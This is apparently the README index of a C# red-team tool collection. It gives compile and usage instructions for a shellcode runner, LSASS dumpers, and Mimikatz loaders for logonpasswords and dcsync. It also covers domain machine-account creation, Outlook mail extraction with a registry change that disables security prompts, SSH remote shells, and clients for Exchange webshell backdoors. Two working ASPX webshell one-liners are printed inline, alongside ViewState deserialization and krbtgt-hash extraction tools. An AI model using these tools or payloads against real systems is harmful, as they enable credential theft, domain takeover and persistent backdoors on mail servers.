C Sharp codes of my blog.
Use CreateThread to run shellcode.
Base64 of the shellcode(msfvenom -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -f csharp)
It will read ShellcodeBase64.txt and launch the shellcode.
Source code is https://github.com/GhostPack/SafetyKatz
Remove some functions of the source code,only used of dumping lsass.exe to the current path.
Complie:
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe DumpLsass.cs
or
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe DumpLsass.cs
Use to run sekurlsa::logonpasswords
and sekurlsa::ekeys
on the minidump file of lsass.exe.
All code from https://github.com/GhostPack/SafetyKatz
I just modified a few lines of code so that it can be compiled by csc.exe.
Eg.
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SafetyKatz.cs /unsafe
or
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SafetyKatz.cs /unsafe
Use to generate the KatzCompressed string in PELoaderofMimikatz.cs
Complie:
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe GzipandBase64.cs
or
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe GzipandBase64.cs
The source file is Casey Smith's PELoader.cs and the version of mimikatz is mimikatz 2.0 alpha (x64) release "Kiwi en C" (Aug 17 2015 00:14:48).
I change it to the new version(mimikatz 2.1.1 (x64) built on Sep 25 2018 15:08:14).
The source code supprot 4.0 or later.
This code supprot 3.5 or later.
Complie:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe PELoaderofMimikatz.cs
or
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe /unsafe PELoaderofMimikatz.cs
This is the dcsync mode extracted from Mimikatz.
The source code in KatzCompressed is https://github.com/3gstudent/test/blob/master/Mimkatz-dcsync.zip
You can use https://github.com/3gstudent/Homework-of-C-Sharp/blob/master/GzipandBase64.cs to generate the KatzCompressed string.
The source code supprot 4.0 or later.
This code supprot 3.5 or later.
Complie:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe DcsyncofMimikatz.cs
or
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe /unsafe DcsyncofMimikatz.cs
Usage:
DcsyncofMimikatz.exe log "lsadump::dcsync /domain:test.com /all /csv" exit
DcsyncofMimikatz.exe log "lsadump::dcsync /domain:test.com /user:administrator /csv" exit
Reference:Casey Smith's PELoader.cs
The source file is Casey Smith's PELoader.cs and the version of mimikatz is mimikatz 2.0 alpha (x64) release "Kiwi en C" (Aug 17 2015 00:14:48).
I change it to the new version(mimikatz 2.1.1 (x64) built on Sep 25 2018 15:08:14).
The source code supprot 4.0 or later.
This code supprot 3.5 or later.
This is a 32-bit version.
Complie:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /unsafe /platform:x86 SharpMimikatz_x86.cs
or
C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe /unsafe /platform:x86 SharpMimikatz_x86.cs
Usage:
SharpMimikatz_x86.exe coffee exit
Reference:Casey Smith's PELoader.cs
The source file is Casey Smith's PELoader.cs and the version of mimikatz is mimikatz 2.0 alpha (x64) release "Kiwi en C" (Aug 17 2015 00:14:48).
I change it to the new version(mimikatz 2.1.1 (x64) built on Sep 25 2018 15:08:14).
The source code supprot 4.0 or later.
This code supprot 3.5 or later.
This is a 64-bit version.
Complie:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /platform:x64 SharpMimikatz_x64.cs
or
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe /unsafe /platform:x64 SharpMimikatz_x64.cs
Usage:
SharpMimikatz_x64.exe coffee exit
Use to generate SharpPELoader.cs
Modified by 3gstudent
Reference:Casey Smith's PELoader.cs
Usage:
SharpPELoaderGenerater.exe <exe path>
Eg.
SharpPELoaderGenerater.exe mimikatz.exe
SharpPELoaderGenerater will determine whether the exe is 32-bit or 64-bit and then generate the corresponding code.
More details:
Reference:https://github.com/pkb1s/SharpAllowedToAct
This code is just part of SharpAllowedToAct.
It can be used to add a Machine Account(User:testNew,Password:123456789).
This code can be complied by csc.exe or Visual Studio.
Supprot .Net 3.5 or later.
Complie:
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe AddMachineAccountofDomain.cs /r:System.DirectoryServices.dll,System.DirectoryServices.Protocols.dll
or
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe AddMachineAccountofDomain.cs /r:System.DirectoryServices.dll,System.DirectoryServices.Protocols.dll
Use MAPI to manage Outlook.
This code can be complied by csc.exe or Visual Studio.
Supprot .Net 3.5 or later.
Complie:
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe mapi_tool.cs /r:Microsoft.Office.Interop.Outlook.dll
or
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe mapi_tool.cs /r:Microsoft.Office.Interop.Outlook.dll
Usage:
mapi_tool.exe GetAllFolders
mapi_tool.exe GetConfig
mapi_tool.exe ListMail <folder>
mapi_tool.exe ListUnreadMail <folder>
Ex command:
mapi_tool.exe GetConfigEx
mapi_tool.exe GetContactsEx
mapi_tool.exe GetGlobalAddressEx
mapi_tool.exe ListMailEx <folder>
mapi_tool.exe ListUnreadMailEx <folder>
mapi_tool.exe SaveAttachment <folder> <EntryID>
<folder>:Inbox/Drafts/SentItems/DeletedItems/Outlook/JunkEmail
Note:
When the antivirus software is inactive or out-of-date,running Ex command will pop up a Outlook security prompt.
You can modify the registry to turn off the Outlook security prompt.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\x.0\Outlook\Security,DWORD:ObjectModelGuard,2
Use for Outlook 2010.
Use for Outlook 2013.
Use to translate Braille Patterns to ASCII characters.
Support:1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ),!/-.?;'$
This code can be complied by csc.exe or Visual Studio.
Supprot .Net 3.5 or later.
Complie:
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe BrailleToASCII.cs
or
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe BrailleToASCII.cs
Use to scan the website SSL certificate.
Reference:https://github.com/ryanries/SharpTLSScan
This code can be complied by csc.exe or Visual Studio.
Supprot .Net 3.5 or later.
Complie:
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SSLCertScan.cs
or
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SSLCertScan.cs
Use to check the valid credential of SSH(Based on SSH.NET).
Support password and privatekeyfile.
Reference:https://github.com/sshnet/SSH.NET
Note:
You need to reference Renci.SshNet.dll.
You can download Renci.SshNet.dll from https://github.com/sshnet/SSH.NET/releases/download/2016.1.0/SSH.NET-2016.1.0-bin.zip
Complie:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SharpSSHCheck_SSH.NET.cs /r:Renci.SshNet.dll
Usage:
SharpSSHCheck_SSH.NET.exe <SSH ServerIP> <SSH ServerPort> <mode> <user> <password>
<mode>:
- plaintext
- keyfile
Eg:
SharpSSHCheck_SSH.NET.exe 192.168.1.1 22 plaintext root toor
SharpSSHCheck_SSH.NET.exe 192.168.1.1 22 keyfile root id_rsa
Remote command execution via SSH(Based on SSH.NET).
Support password and privatekeyfile.
Reference:https://github.com/sshnet/SSH.NET
Note:
You need to reference Renci.SshNet.dll.
You can download Renci.SshNet.dll from https://github.com/sshnet/SSH.NET/releases/download/2016.1.0/SSH.NET-2016.1.0-bin.zip
Complie:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SharpSSHRunCmd_SSH.NET.cs /r:Renci.SshNet.dll
Usage:
SharpSSHRunCmd_SSH.NET.exe <SSH ServerIP> <SSH ServerPort> <mode> <user> <password> <cmd>
<mode>:
- plaintext
- keyfile
If the <cmd> is shell,you will get an interactive shell.
Eg:
SharpSSHRunCmd_SSH.NET.exe 192.168.1.1 22 plaintext root toor shell
SharpSSHRunCmd_SSH.NET.exe 192.168.1.1 22 keyfile root id_rsa ps
Use to export all users' mail by LDAP.
Modified from https://github.com/Mr-Un1k0d3r/RedTeamCSharpScripts/blob/master/enumerateuser.cs
Complie:
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe ListUserMailbyLDAP.cs /r:System.DirectoryServices.dll
or
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe ListUserMailbyLDAP.cs /r:System.DirectoryServices.dll
Usage:
ListUserMailbyLDAP <LDAP ServerIP> <user> <password>
Eg:
ListUserMailbyLDAP.exe 192.168.1.1 test1 password1
Use to export all users with password_never_expires by LDAP.
Complie:
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe List_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll
or
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe List_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll
Usage:
List_passwordneverexpires_user_byLDAP <LDAP ServerIP> <user> <password>
Eg:
List_passwordneverexpires_user_byLDAP.exe 192.168.1.1 test1 password1
Use to set the selected user with password_never_expires by LDAP.
Complie:
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe Add_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll
or
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Add_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll
Usage:
Add_passwordneverexpires_user_byLDAP <LDAP ServerIP> <user> <password> <target user>
Eg:
Add_passwordneverexpires_user_byLDAP.exe 192.168.1.1 administrator password1 test1
From:https://github.com/FortyNorthSecurity/SqlClient
Use to query the MSSQL database.
Complie:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SqlClient.cs
or
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SqlClient.cs
Use to export the AD data by LDAP. Complie:
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SharpADFindDemo.cs /r:System.DirectoryServices.dll
or
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SharpADFindDemo.cs /r:System.DirectoryServices.dll
Usage:
SharpADFindDemo <LDAP ServerIP> <user> <password> <command>
command:
- user
- machine
- group
- ou
- username
- machinename
- groupname
- ouname
Note:The maxsize is 1000.
Eg:
SharpADFindDemo.exe 192.168.1.1 test1 password1 user
Python Version: SharpExchangeBackdoor.py
Use to send payload to the Exchange webshell backdoor.
Support:
- assemblyLoad
- webshellWrite
Usage:
<url> <user> <password> <mode> <path>
mode:
assemblyLoad
webshellWrite
eg.
SharpExchangeBackdoor.exe https://192.168.1.1/owa/auth/errorFE.aspx no auth assemblyLoad payload.dll
SharpExchangeBackdoor.exe https://192.168.1.1/ecp/About.aspx user1 123456 webshellWrite payload.aspx
assemblyLoad.aspx:
<%@ Page Language="C#" %><%System.Reflection.Assembly.Load(Convert.FromBase64String(Request.Form["demodata"])).CreateInstance("Payload").Equals("");%>
webshellWrite.aspx:
<%@ Page Language="C#" %><%if (Request.Files.Count!=0)Request.Files[0].SaveAs(Server.MapPath("./uploadDemo.aspx"));}%>
Use to create viewstate from XAML file
Usage:
<xaml path> <generator> <key>
eg.
XamlToViewState.exe Run-Calc.xml 042A94E8 CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF
Use to create viewstate from Serialize Xaml data.
Code from https://github.com/zcgonvh/CVE-2020-0688/blob/master/ExchangeCmd.cs
Use to test the deserializing code execution of Exchange.
From read and write permissions of Exchange files to deserializing code execution.
You should modify the machineKey in %ExchangeInstallPath%\FrontEnd\HttpProxy<path>\web.config to implement deserializing code execution.
<path>
:owa or ecp
Usage:
<url> <key> <path>
eg.
192.168.1.1 CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF owa
mail.test.com CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF ecp
Use to send payload to the Exchange webshell backdoor. The communication is encrypted by AES.
Support function:
- generate : generate the webshell
- dumplsass: save the dump file of LSASS to C:\Windows\Temp\lsass.bin
- parsedump: use mimikatz to load C:\Windows\Temp\lsass.bin and save the results to C:\Windows\Temp\mimikatz.log
Usage:
<url> <user> <password> <mode>
mode:
- generate
- dumplsass
- parsedump
eg.
SharpExchangeDumpHash.exe https://192.168.1.1/owa/auth/1.aspx no auth dumplsass
SharpExchangeDumpHash.exe https://192.168.1.1/ecp/Education.aspx user1 123456 parsedump
Use DRSR protocol to ask a domain controller to get the krbtgt's hash.
Reference:https://github.com/vletoux/MakeMeEnterpriseAdmin
use DRSR protocol to ask a domain controller to synchronize a specified entry.
Reference:https://github.com/vletoux/MakeMeEnterpriseAdmin
Use to import the TGT
Reference:https://github.com/vletoux/MakeMeEnterpriseAdmin
Use RPC to get the login IP of domain users through the event log.
Support local and remote access
Use WMI to get the login IP of domain users through the event log.
Support local and remote access